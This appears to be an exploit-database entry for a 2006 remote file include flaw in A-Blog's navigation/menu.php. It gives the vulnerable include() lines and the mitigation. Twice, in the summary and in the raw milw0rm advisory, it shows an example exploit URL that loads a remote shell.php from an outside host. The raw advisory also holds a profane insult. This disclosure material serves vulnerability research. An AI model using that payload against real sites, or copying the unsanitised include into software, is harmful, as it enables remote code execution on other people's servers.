header-logo
Suggest Exploit
vendor:
A-Blog
by:
Drago84
7,5
CVSS
HIGH
Remote File Include
94
CWE
Product Name: A-Blog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

A-Blog Remote File Include

A-Blog is vulnerable to a remote file include vulnerability. The vulnerable code is present in the menu.php file located in the navigation directory. The vulnerable code is <?php include ("$navigation_start"); ?> and <?php include("$navigation_middle"); ?>. An example exploit is http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?. The solution is to include the mainfile.php in the page.

Mitigation:

Include the mainfile.php in the page.
Source

Exploit-DB raw data:

###### ToXiC #########################
#
#A-Blog Remote File Include
#
#BuG FounD by Drago84
#
#Application Affect:A-Blog
#Source Code:
#http://prdownloads.sourceforge.net/a-blog/A-BlogV2.rar?download
#Problem:
#<?php include ("$navigation_start"); ?>
#<?php include("$navigation_middle"); ?>
#Soluction:
#Include in page require ("mainfile.php");
#Page Vulnerable : menu.php
#Dir : /navigation/
# Exempe Of ExPloit
is:
#http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?

#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic,a|x
# ToXic Security Italian CreW

######
ToXiC
###################

# milw0rm.com [2006-09-26]

Navigation

Suggest Exploit

Services By CQR